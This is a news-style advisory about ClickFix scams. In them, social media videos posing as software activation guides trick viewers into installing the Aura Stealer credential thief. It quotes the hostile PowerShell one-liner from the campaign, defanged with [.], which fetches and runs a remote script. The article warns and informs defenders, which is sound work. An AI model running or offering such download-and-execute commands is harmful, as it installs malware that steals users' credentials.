Online Scammers Use Social Media Videos to Spread Malicious Software
There is a growing concern over a recent scam where online tricksters are disguising harmful software as free activation guides for popular applications through social media videos. These videos claim to offer step-by-step instructions to access premium features of widely-used software but instead, lead users to inadvertently download malware onto their devices.
Understanding the Scam
These deceptive videos are part of a larger operation that has been identified by cybersecurity experts. The videos, which appear on a popular social video platform, claim to offer guidance on how to access legitimate services like operating systems, professional video editing software, and even premium features of popular music and video streaming platforms.
These guides are part of a social engineering attack known as a ClickFix attack. This technique uses seemingly genuine "solutions" or instructions that trick users into running harmful commands or scripts on their devices. These commands then install malicious software on their computers.
How the Scam Works
The videos typically showcase a simple command line and instruct viewers to execute it as an administrator in PowerShell – a task automation and configuration management framework from a popular software company:
iex (irm slmgr[.]win/photoshop)
It's important to note that the name of the software in the URL varies depending on the software that the video is pretending to guide for. For instance, in videos that claim to activate an operating system, the URL would include the name of that operating system rather than 'photoshop'.
When the command is run, PowerShell connects to a remote site to retrieve and run another script. This script then downloads two executable files from seemingly harmless pages, with the first executable being a variant of the Aura Stealer malware.
This malware is designed to collect saved credentials from various applications including browsers, cryptocurrency wallets, and other programs, and then transmit them to the scammers, compromising the user's accounts.
Additional Payloads
A cybersecurity expert has pointed out that another payload named 'source.exe' will also be downloaded, which is used to self-compile code using a built-in compiler from a popular software development platform. This code is then injected and launched in memory. The exact purpose of this additional payload is currently uncertain.
Protecting Yourself
If you've fallen victim to this scam and followed these steps, it's crucial that you consider all your credentials as compromised. You should immediately change your passwords on all sites you frequently visit.
ClickFix attacks have grown increasingly common over the past year, being utilized to distribute various types of malware in ransomware and cryptocurrency theft campaigns. It's crucial to remain vigilant and ensure that any guides followed are from trusted, verified sources to avoid falling victim to such scams.